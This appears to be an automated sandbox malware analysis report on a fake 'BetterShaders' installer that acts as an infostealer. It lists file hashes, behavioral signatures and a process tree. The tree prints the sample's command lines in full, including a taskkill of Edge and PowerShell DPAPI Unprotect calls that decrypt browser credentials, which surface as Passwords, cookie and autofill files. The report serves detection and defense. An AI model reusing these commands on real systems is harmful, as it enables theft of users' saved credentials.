Overview
overview
7Static
static
3BetterShad....0.exe
windows7-x64
7BetterShad....0.exe
windows10-2004-x64
7$PLUGINSDI...ls.dll
windows7-x64
3$PLUGINSDI...ls.dll
windows10-2004-x64
3$PLUGINSDI...em.dll
windows7-x64
3$PLUGINSDI...em.dll
windows10-2004-x64
3$PLUGINSDIR/app-64.7z
windows7-x64
3$PLUGINSDIR/app-64.7z
windows10-2004-x64
3BetterShaders.exe
windows10-2004-x64
7LICENSES.c...m.html
windows7-x64
1LICENSES.c...m.html
windows10-2004-x64
1d3dcompiler_47.dll
windows10-2004-x64
1ffmpeg.dll
windows10-2004-x64
1libEGL.dll
windows10-2004-x64
1libGLESv2.dll
windows10-2004-x64
1resources/elevate.exe
windows7-x64
1resources/elevate.exe
windows10-2004-x64
1vk_swiftshader.dll
windows10-2004-x64
1vulkan-1.dll
windows10-2004-x64
1$PLUGINSDI...7z.dll
windows7-x64
3$PLUGINSDI...7z.dll
windows10-2004-x64
3Analysis
- max time kernel: 151s
- max time network: 159s
- platform: windows10-2004_x64
- resource: win10v2004-20240508-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 27/05/2024, 14:34
Static task: static1
Behavioral tasks (sample, resource):
- behavioral1: BetterShaders 3.8.0.exe (win7-20240419-en)
- behavioral2: BetterShaders 3.8.0.exe (win10v2004-20240508-en)
- behavioral3: $PLUGINSDIR/StdUtils.dll (win7-20240220-en)
- behavioral4: $PLUGINSDIR/StdUtils.dll (win10v2004-20240508-en)
- behavioral5: $PLUGINSDIR/System.dll (win7-20240221-en)
- behavioral6: $PLUGINSDIR/System.dll (win10v2004-20240508-en)
- behavioral7: $PLUGINSDIR/app-64.7z (win7-20240419-en)
- behavioral8: $PLUGINSDIR/app-64.7z (win10v2004-20240508-en)
- behavioral9: BetterShaders.exe (win10v2004-20240508-en)
- behavioral10: LICENSES.chromium.html (win7-20240215-en)
- behavioral11: LICENSES.chromium.html (win10v2004-20240508-en)
- behavioral12: d3dcompiler_47.dll (win10v2004-20240426-en)
- behavioral13: ffmpeg.dll (win10v2004-20240426-en)
- behavioral14: libEGL.dll (win10v2004-20240426-en)
- behavioral15: libGLESv2.dll (win10v2004-20240508-en)
- behavioral16: resources/elevate.exe (win7-20231129-en)
- behavioral17: resources/elevate.exe (win10v2004-20240508-en)
- behavioral18: vk_swiftshader.dll (win10v2004-20240508-en)
- behavioral19: vulkan-1.dll (win10v2004-20240508-en)
- behavioral20: $PLUGINSDIR/nsis7z.dll (win7-20240508-en)
- behavioral21: $PLUGINSDIR/nsis7z.dll (win10v2004-20240426-en)
General
- Target: BetterShaders.exe
- Size: 168.8MB
- MD5: 26e51744ce941b55c7653e9ab229a18f
- SHA1: bd08f0f5b3f64aba844128dfb2d77312bbef8b46
- SHA256: 3bcf3c61e80cc6346a8af84c89ca2c50a9eef2b6b915c6c73fff8725f1c6b118
- SHA512: a308443b59a0a5713b99474e30f93a7f8cc98120c11c2f9f5884d5aa61bbf0073a6cfb1c67d676d64656988802fbf1bb8a1f5234df09b1fd2c36f5f7d3fed0a4
- SSDEEP: 1572864:du3SXrDDmfijsEGl0y+Mgp4cLTRN/33i/oHHl9sqPwqZdsJ2DWw3h9JByba/:/XX++LYYyba
Malware Config
Signatures
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
  Key value queried: \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation (process: BetterShaders.exe)
- Loads dropped DLL (1 IoC)
  PID 3892 BetterShaders.exe
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Looks up external IP address via web service (2 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  Flow 27: ipapi.co; flow 29: ipapi.co
- An obfuscated cmd.exe command-line is typically used to evade detection. (2 IoCs)
  PID 1632 cmd.exe; PID 3964 cmd.exe
- Enumerates processes with tasklist (1 TTP, 1 IoC)
  PID 2832 tasklist.exe
- Kills process with taskkill (1 IoC)
  PID 2844 taskkill.exe
- Opens file in notepad (likely ransom note) (3 IoCs)
  PID 3656 NOTEPAD.EXE; PID 4660 NOTEPAD.EXE; PID 3792 NOTEPAD.EXE
- Suspicious behavior: AddClipboardFormatListener (1 IoC)
  PID 3788 vlc.exe
- Suspicious behavior: EnumeratesProcesses (7 IoCs)
  PID 1592 powershell.exe (3 entries); PID 3472 powershell.exe (2 entries); PID 2592 BetterShaders.exe (2 entries)
- Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  PID 3788 vlc.exe
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Token SeDebugPrivilege: PID 2832 tasklist.exe; PID 2844 taskkill.exe; PID 1592 powershell.exe; PID 3472 powershell.exe
  Tokens SeShutdownPrivilege and SeCreatePagefilePrivilege, alternating: PID 3892 BetterShaders.exe (the remaining 60 entries)
- Suspicious use of FindShellTrayWindow (3 IoCs)
  PID 3788 vlc.exe (3 entries)
- Suspicious use of SendNotifyMessage (2 IoCs)
  PID 3788 vlc.exe (2 entries)
- Suspicious use of SetWindowsHookEx (1 IoC)
  PID 3788 vlc.exe
- Suspicious use of WriteProcessMemory (50 IoCs)
  PID 3892 BetterShaders.exe wrote to memory of PID 2232 (procid_target 99): 2 entries
  PID 2232 cmd.exe wrote to memory of PID 2832 (procid_target 101): 2 entries
  PID 3892 BetterShaders.exe wrote to memory of PID 840 (procid_target 102): 2 entries
  PID 840 cmd.exe wrote to memory of PID 2844 (procid_target 104): 2 entries
  PID 3892 BetterShaders.exe wrote to memory of PID 1632 (procid_target 105): 2 entries
  PID 1632 cmd.exe wrote to memory of PID 1592 (procid_target 107): 2 entries
  PID 3892 BetterShaders.exe wrote to memory of PID 3964 (procid_target 108): 2 entries
  PID 3964 cmd.exe wrote to memory of PID 3472 (procid_target 110): 2 entries
  PID 3892 BetterShaders.exe wrote to memory of PID 1288 (procid_target 111): 30 entries
  PID 3892 BetterShaders.exe wrote to memory of PID 4512 (procid_target 112): 2 entries
  PID 3892 BetterShaders.exe wrote to memory of PID 2592 (procid_target 136): 2 entries
Processes (indentation gives the process tree depth)
- C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe (PID 3892)
  Command line: "C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe"
  Signatures: Checks computer location settings; Loads dropped DLL; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
  - C:\Windows\system32\cmd.exe (PID 2232)
    Command line: C:\Windows\system32\cmd.exe /d /s /c "tasklist"
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\tasklist.exe (PID 2832)
      Command line: tasklist
      Signatures: Enumerates processes with tasklist; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\cmd.exe (PID 840)
    Command line: C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM msedge.exe /F"
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\taskkill.exe (PID 2844)
      Command line: taskkill /IM msedge.exe /F
      Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\cmd.exe (PID 1632)
    Command line: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,178,229,138,184,191,54,18,71,183,48,31,104,227,4,221,178,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,0,78,45,1,2,73,101,138,92,248,203,36,214,3,29,227,126,43,5,213,73,178,36,50,196,50,207,115,181,6,197,32,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,100,219,159,52,176,208,115,13,56,208,151,127,54,129,239,61,201,132,227,174,108,32,71,248,72,155,160,225,38,252,147,203,48,0,0,0,197,0,36,240,9,215,176,156,79,184,233,65,75,233,34,162,148,88,138,202,207,252,36,242,164,230,221,121,165,227,58,204,54,172,208,39,144,191,58,71,214,82,223,125,228,156,102,173,64,0,0,0,231,83,253,134,63,37,150,64,131,136,72,63,218,180,121,158,202,225,25,28,220,224,224,100,212,227,145,186,16,22,203,112,136,253,150,50,127,211,24,206,170,121,22,93,168,43,216,180,15,2,66,106,49,3,52,195,201,207,79,83,68,16,5,250), $null, 'CurrentUser')"
    Signatures: An obfuscated cmd.exe command-line is typically used to evade detection.; Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1592)
      Command line: powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,178,229,138,184,191,54,18,71,183,48,31,104,227,4,221,178,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,0,78,45,1,2,73,101,138,92,248,203,36,214,3,29,227,126,43,5,213,73,178,36,50,196,50,207,115,181,6,197,32,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,100,219,159,52,176,208,115,13,56,208,151,127,54,129,239,61,201,132,227,174,108,32,71,248,72,155,160,225,38,252,147,203,48,0,0,0,197,0,36,240,9,215,176,156,79,184,233,65,75,233,34,162,148,88,138,202,207,252,36,242,164,230,221,121,165,227,58,204,54,172,208,39,144,191,58,71,214,82,223,125,228,156,102,173,64,0,0,0,231,83,253,134,63,37,150,64,131,136,72,63,218,180,121,158,202,225,25,28,220,224,224,100,212,227,145,186,16,22,203,112,136,253,150,50,127,211,24,206,170,121,22,93,168,43,216,180,15,2,66,106,49,3,52,195,201,207,79,83,68,16,5,250), $null, 'CurrentUser')
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - C:\Windows\system32\cmd.exe (PID 3964)
    Command line: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,178,229,138,184,191,54,18,71,183,48,31,104,227,4,221,178,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,235,109,63,161,143,103,239,2,243,42,0,152,229,80,171,0,159,246,122,218,102,1,201,41,199,97,231,141,3,106,5,145,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,28,248,39,179,16,168,130,106,211,0,97,0,128,122,38,238,106,157,215,12,26,220,5,94,0,18,197,241,30,209,133,237,48,0,0,0,94,231,22,67,115,230,229,203,231,167,104,218,247,164,4,250,85,64,58,98,170,216,75,184,105,46,36,45,95,94,206,149,65,52,170,185,236,180,195,205,32,56,192,56,21,251,66,54,64,0,0,0,2,83,162,89,41,109,219,141,218,61,37,223,251,2,114,133,242,58,77,7,58,223,102,204,149,171,52,166,22,73,227,39,184,85,13,27,246,113,204,235,52,211,6,50,1,238,240,195,92,174,30,192,214,135,234,206,46,248,21,9,246,215,58,66), $null, 'CurrentUser')"
    Signatures: An obfuscated cmd.exe command-line is typically used to evade detection.; Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3472)
      Command line: powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,178,229,138,184,191,54,18,71,183,48,31,104,227,4,221,178,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,235,109,63,161,143,103,239,2,243,42,0,152,229,80,171,0,159,246,122,218,102,1,201,41,199,97,231,141,3,106,5,145,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,28,248,39,179,16,168,130,106,211,0,97,0,128,122,38,238,106,157,215,12,26,220,5,94,0,18,197,241,30,209,133,237,48,0,0,0,94,231,22,67,115,230,229,203,231,167,104,218,247,164,4,250,85,64,58,98,170,216,75,184,105,46,36,45,95,94,206,149,65,52,170,185,236,180,195,205,32,56,192,56,21,251,66,54,64,0,0,0,2,83,162,89,41,109,219,141,218,61,37,223,251,2,114,133,242,58,77,7,58,223,102,204,149,171,52,166,22,73,227,39,184,85,13,27,246,113,204,235,52,211,6,50,1,238,240,195,92,174,30,192,214,135,234,206,46,248,21,9,246,215,58,66), $null, 'CurrentUser')
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
  - C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe (PID 1288)
    Command line: "C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\BetterShaders" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1912,i,9188145920335173270,17345024384858000960,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1920 /prefetch:2
  - C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe (PID 4512)
    Command line: "C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\BetterShaders" --field-trial-handle=2140,i,9188145920335173270,17345024384858000960,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2136 /prefetch:3
  - C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe (PID 2592)
    Command line: "C:\Users\Admin\AppData\Local\Temp\BetterShaders.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\Admin\AppData\Roaming\BetterShaders" --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2008,i,9188145920335173270,17345024384858000960,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2516 /prefetch:8
    Signatures: Suspicious behavior: EnumeratesProcesses
- C:\Windows\System32\rundll32.exe (PID 3624)
  Command line: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
- C:\Windows\system32\NOTEPAD.EXE (PID 3656)
  Command line: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Passwords.txt
  Signatures: Opens file in notepad (likely ransom note)
- C:\Windows\system32\NOTEPAD.EXE (PID 4660)
  Command line: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Temp1_cookies.zip\Microsoft_Default.txt
  Signatures: Opens file in notepad (likely ransom note)
- C:\Windows\system32\NOTEPAD.EXE (PID 3792)
  Command line: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Autofills.txt
  Signatures: Opens file in notepad (likely ransom note)
- C:\Program Files\VideoLAN\VLC\vlc.exe (PID 3788)
  Command line: "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Desktop\HideUndo.ram"
  Signatures: Suspicious behavior: AddClipboardFormatListener; Suspicious behavior: GetForegroundWindowSpam; Suspicious use of FindShellTrayWindow; Suspicious use of SendNotifyMessage; Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 3KB
  MD5: f48896adf9a23882050cdff97f610a7f
  SHA1: 4c5a610df62834d43f470cae7e851946530e3086
  SHA256: 3ae35c2828715a2f9a5531d334a0cfffc81396c2dc058ca42a9943f3cdc22e78
  SHA512: 16644246f2a35a186fcb5c2b6456ed6a16e8db65ad1383109e06547f9b1f9358f071c30cca541ca4cf7bae66cb534535e88f75f6296a4bfc6c7b22b0684a6ba9
- Filesize: 1KB
  MD5: 68d80cc2ac40ea9e5c7297fba6623c45
  SHA1: 05908daef7414f753fa6006082c42485002a7da8
  SHA256: 3b059d656dae93233a96c9079352c1d77c6abfec689cc6236b93b427c9918e96
  SHA512: 2c51e963eba030ee4f2ef5df1577a8ce38cacd6ffc3d0c56258db173352b46cd6048505061c65bd5757d14e2e27d9d396cbce95d58406660af62365bd4e7afb6
- Filesize: 1.8MB
  MD5: 3072b68e3c226aff39e6782d025f25a8
  SHA1: cf559196d74fa490ac8ce192db222c9f5c5a006a
  SHA256: 7fb52b781709b065c240b6b81394be6e72e53fe11d7c8e0f7b49dd417eb78a01
  SHA512: 61ebc72c20195e99244d95af1ab44fa06201a1aee2b5da04490fdc4312e8324a40b0e15a7b42fab5179753d767c1d08ae1a7a56ac71a6e100e63f83db849ee61
- Filesize: 90B
  MD5: 8fb196cd3b31b00bb8e35df5c490ade1
  SHA1: cf7acf3dde5ba8f808be6025cf28dfe573120307
  SHA256: 969fd23147e88067565018fc4141eed85cd208906a8b878b098defeb4156ebf8
  SHA512: 1c101e51db23045dcaf2edf4e414099c3430951afb9625673197f1d21df7cded2c2bd43e02966571c6910d107a5a04b2461bc030e6babe9343090bf05ca63581
- Filesize: 71B
  MD5: 4d6eadc6c0ff2a52aae242512cface64
  SHA1: 58585d6d017a8c2a597d7b88e98825c59f3368c5
  SHA256: d177217ce74775a6fdc5d0880f58da76105315c7bf732892b5e11e19c0175e09
  SHA512: 63fd17a1fec1efb41fce70b6b9130de215c63e1ed58a3169139b21cd32f84804d5fbfde5b76a894d83f2c71f8bf594cd855f823dc16ce984f2f3aec228759f58
- Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82